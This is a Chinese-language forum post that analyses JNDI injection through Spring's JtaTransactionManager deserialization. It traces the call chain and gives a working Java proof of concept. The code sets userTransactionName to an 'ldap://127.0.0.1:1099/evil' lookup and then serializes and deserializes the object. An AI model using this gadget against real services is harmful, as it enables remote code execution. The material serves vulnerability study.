Spring反序列化JNDI分析

饭宝  金牌会员 | 2024-5-16 13:22:11 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题

主题 897|帖子 897|积分 2691

漏洞原理

Spring框架的JtaTransactionManager类中重写了readObject方法,这个方法终极会调用到JNDI中的lookup()方法,关键是里面的参数可控,这就导致了攻击者可以使用JNDI注入中的lookup()参数注入,传入恶意URI地址指向攻击者的RMI注册表服务,以使受害者客户端加载绑定在攻击者RMI注册表服务上的恶意类,从而实现远程代码执行。
环境依赖
  1. <dependency>
  2.   <groupId>org.springframework</groupId>
  3.   <artifactId>spring-tx</artifactId>
  4.   <version>4.2.4.RELEASE</version>
  5. </dependency>
  6. <dependency>
  7.   <groupId>org.springframework</groupId>
  8.   <artifactId>spring-context</artifactId>
  9.   <version>4.2.4.RELEASE</version>
  10. </dependency>
  11. <dependency>
  12.   <groupId>javax.transaction</groupId>
  13.   <artifactId>javax.transaction-api</artifactId>
  14.   <version>1.2</version>
  15. </dependency>
复制代码
流程分析

漏洞入口在org/springframework/transaction/jta/JtaTransactionManager.java的readObject方法

跟进initUserTransactionAndTransactionManager

跟进lookupUserTransaction,这里调用了lookup

跟进lookup方法

继承跟进lookup方法,这里调用的是ctx的lookup方法,ctx是一个Context类型,往后追踪ctx,发现ctx实在是InitialContext类的实例,以是这里我们控制name的值就能直接打JNDI注入了

name就是JtaTransactionManager的属性userTransactionName,我们可以反射修改它的值
  1. package org.example;
  2. import org.springframework.transaction.jta.JtaTransactionManager;
  3. import java.io.*;
  4. import java.lang.reflect.Field;
  5. import java.nio.file.Files;
  6. import java.nio.file.Paths;
  7. public class Main {
  8.     public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
  9.         JtaTransactionManager jtaTransactionManager = new JtaTransactionManager();
  10.         Field userTransactionName = JtaTransactionManager.class.getDeclaredField("userTransactionName");
  11.         userTransactionName.setAccessible(true);
  12.         userTransactionName.set(jtaTransactionManager, "ldap://127.0.0.1:1099/evil");
  13.         // 序列化
  14.         ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("test.bin"));
  15.         oos.writeObject(jtaTransactionManager);
  16.         // 反序列化
  17.         byte[] bytes = Files.readAllBytes(Paths.get("D:\\Java安全学习\\SpringJNDI\\test.bin"));
  18.         ByteArrayInputStream bis = new ByteArrayInputStream(bytes);
  19.         ObjectInputStream obj = new ObjectInputStream(bis);
  20.         obj.readObject();
  21.     }
  22. }
复制代码
成功注入

rmi也是同理,把ldap换成rmi就行了,至于恶意服务端怎么搭建,之前的文章有讲过,这里就不再复述

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

饭宝

金牌会员
这个人很懒什么都没写!
快速回复 返回顶部 返回列表